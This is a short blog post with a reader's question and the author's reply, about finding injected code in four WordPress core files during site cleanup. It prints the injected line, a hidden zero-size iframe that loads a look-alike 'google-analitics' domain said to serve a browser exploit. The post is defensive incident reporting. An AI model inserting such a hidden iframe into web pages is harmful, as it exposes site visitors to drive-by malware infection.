I got called in to resolve an issue on a WordPress blog today. On the surface it looked as if the administration side of the site had broken, but the real cause turned out to be much darker than that.
Looking at the source of the page, I could see that lines were being inserted on all pages that tried to open an iFrame onto a website that used a browser exploit to try and install a virus on your computer. If my browser wasn’t patched and I wasn’t using a virus scanner, it could have been a ton of work for me to clean up. The question was, where was that iFrame coming from?
Turns out that a couple (4 actually) of WordPress files had got compromised and had extra lines added to them to open this iFrame. The files were:
- wp-feed.php
- wp-blog-header.php
- wp-config.php
- wp-load.php
This was the extra line:
<iframe src="http://google-analitics.ws/out.php?s_id=1" width="0" height="0" frameborder="0"></iframe>
These files are used in every WordPress page load and were the cause of the extra iFrame. The big question was how the files got compromised in the first place. They were set to the correct permissions, so could only have been changed by someone (or a script) with root access to the server. Unforuntately this is not something you can protect against. Almost make sure your blog is living on a reliable host and remember, “It’s wilder than Las Vegas out there”
How did you track the line of code down to those 4 files? Or even identify it in the first place?
@Brett: Well, I looked in the usual places (.htaccess, wp-content, etc) where malicious code sits, but didn’t find anything. I started walking through the code but thought that was too much hassle.
Then I got the idea of sorting the files in FTP by timestamp and there, in the root, where the 4 files that had been touched with today’s timestamp. And there was the extra line of code.
I thought I’d blog about it to stop people having to go through the whole investigation process.